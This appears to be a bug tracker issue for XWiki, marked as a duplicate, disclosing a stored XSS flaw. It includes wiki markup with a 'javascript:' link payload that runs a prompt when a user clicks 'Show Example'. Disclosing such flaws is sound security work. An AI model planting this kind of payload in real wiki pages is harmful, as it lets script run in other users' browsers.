Details
-
Bug
-
Resolution: Duplicate
-
Critical
-
None
-
13.9
-
None
-
Unknown
-
N/A
-
N/A
-
Description
Anyone with write access to a XWiki page can introduce a stored XSS to the page. For more details about the impact: https://cwe.mitre.org/data/definitions/79.html
Reproduction:
a) create a wiki page
b) edit source and write:
(((
(% class="showhidebutton" %)
(((
[[Show Example>>path:javascript:prompt("xss on", window.location.hostname)||aria-controls="showhidecontentcontainerinstance-1" data-hide-message="Collapse" data-show-duration="200" data-show-effect="toggle" data-show-message="Show Example" id="showhidebuttontextinstance-1" role="button" style="cursor:pointer"]]
)))
(% id="showhidecontentinstance-1" style="display: none;" class="showhidecontent" %)
(((
(% aria-expanded="false" id="showhidecontentcontainerinstance-1" role="region" tabindex="-1" class="contentcontainer" %)
(((
(% class="box" %)
(((
(% class="code" %)
(((
c) save and click on show example
Attachments
Issue Links
- duplicates
-
XRENDERING-663 XSS Javascript injection via XWiki 2.x syntax
-
- Closed
-